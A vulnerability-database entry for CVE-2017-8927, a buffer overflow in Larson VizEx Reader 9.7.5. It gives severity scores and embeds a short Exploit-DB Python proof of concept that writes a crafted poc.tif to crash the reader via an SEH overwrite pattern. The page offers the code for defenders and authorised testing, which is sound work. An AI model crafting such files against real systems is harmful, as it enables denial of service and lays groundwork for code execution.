CVE-2017-8927
high
CVSS v3
7.8
CVSS v4 NEW
โ
VIR risk
8.8
Description
Buffer overflow in Larson VizEx Reader 9.7.5 allows attackers to cause a denial of service or possibly have unspecified other impact via a crafted .tif file.
Predictions
Exploit likelihood
75%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Larson VizEx Reader 9.7.5 - Local Buffer Overflow (SEH)
#!/usr/bin/python
# Exploit Title : Larson VizEx Reader 9.7.5 - Local Buffer Overflow (SEH)
# Date : 14/05/2017
# Exploit Author : Muhann4d
# CVE : CVE-2017-8927
# Vendor Homepage : http://www.cgmlarson.com/
# Software Link : http://download.freedownloadmanager.org/Windows-PC/Larson-VizEx-Reader/FREE-9.7.5.html
# Affected Versions : 9.7.5
# Category : Denial of Service (DoS) Local
# Tested on OS : Windows 7 Professional SP1 32bit
# Proof of Concept : run the exploit, open the poc.tif file with Larson VizEx Reader 9.7.5
# Vendor has been cantacted but no reply
buf = "\x41" * 800
buff = "\x42" * 4
bufff = "\x43" * 4
buffff = "\x44" * 9999
f = open ("poc.tif", "w")
f.write(buf + buff + bufff + buffff)
f.close()Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| cgmlarson | vizex_reader | 9.7.5 | |
References
CWEs
CWE-119
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.